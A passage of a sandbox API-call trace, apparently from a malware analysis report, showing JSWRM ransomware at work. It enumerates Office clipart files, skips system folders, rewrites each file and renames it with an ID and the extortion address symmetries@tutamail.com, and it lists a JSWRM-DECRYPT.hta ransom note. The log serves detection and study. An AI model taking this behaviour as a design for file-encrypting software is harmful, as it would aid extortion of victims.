nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16d0, lpOverlapped=0x0) returned 1 [0091.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.212] CloseHandle (hObject=0x314) returned 1 [0091.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0091.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0091.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0091.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0091.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0091.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0091.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.213] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\JNGLE_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\jngle_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0091.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0091.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0091.213] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x224542f0, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x224542f0, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x224542f0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0091.213] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0091.213] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0091.213] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0091.213] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0091.213] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0091.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0091.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0091.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0091.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0091.214] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0091.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0091.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0091.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0091.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0091.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0091.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0091.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0091.214] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15f6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="MP00021_.WMF", cAlternateFileName="")) returned 1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2=".") returned 1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="..") returned 1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="...") returned 1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="windows") returned -1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="recovery") returned -1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="perflogs") returned -1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="documents and settings") returned 1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="system volume information") returned -1 [0091.214] lstrcmpiW (lpString1="MP00021_.WMF", lpString2="msocache") returned -1 [0091.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0091.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00021_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00021_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MP00021_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0091.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0091.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00021_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00021_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MP00021_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0091.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0091.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0091.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00021_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.216] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5622) returned 1 [0091.216] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15f0) returned 0x205850 [0091.216] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x15f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x15f0, lpOverlapped=0x0) returned 1 [0091.218] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.218] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x15f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x15f0, lpOverlapped=0x0) returned 1 [0091.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.218] CloseHandle (hObject=0x314) returned 1 [0091.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0091.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0091.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0091.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0091.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0091.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.218] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00021_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00021_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00021_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0091.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0091.219] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1090, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="MP00132_.WMF", cAlternateFileName="")) returned 1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2=".") returned 1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="..") returned 1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="...") returned 1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="windows") returned -1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="recovery") returned -1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="perflogs") returned -1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="documents and settings") returned 1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="system volume information") returned -1 [0091.219] lstrcmpiW (lpString1="MP00132_.WMF", lpString2="msocache") returned -1 [0091.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0091.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00132_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00132_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MP00132_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0091.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0091.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00132_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00132_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MP00132_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0091.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0091.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00132_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.221] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4240) returned 1 [0091.221] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1090) returned 0x23fc98 [0091.221] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1090, lpOverlapped=0x0) returned 1 [0091.223] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.223] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1090, lpOverlapped=0x0) returned 1 [0091.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0091.223] CloseHandle (hObject=0x314) returned 1 [0091.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0091.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0091.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0091.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0091.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0091.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0091.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.224] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00132_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MP00132_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\mp00132_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0091.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0091.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0091.224] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31e2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="MP00646_.WMF", cAlternateFileName="")) returned 1 [0091.224] lstrcmpiW (lpString1="MP00646_.WMF", lpString2=".") returned 1 [0091.224] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="..") returned 1 [0091.224] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="...") returned 1 [0091.225] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="windows") returned -1 [0091.225] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="recovery") returned -1 [0091.225] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="perflogs") returned -1 [0091.225] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="documents and settings") returned 1 [0091.225] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.225] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="system volume information") returned -1 [0091.225] lstrcmpiW (lpString1="MP00646_.WMF", lpString2="msocache") returned -1 [0091.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0091.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00646_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00646_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MP00646_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0091.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0091.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00646_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MP00646_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MP00646_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0091.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0091.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 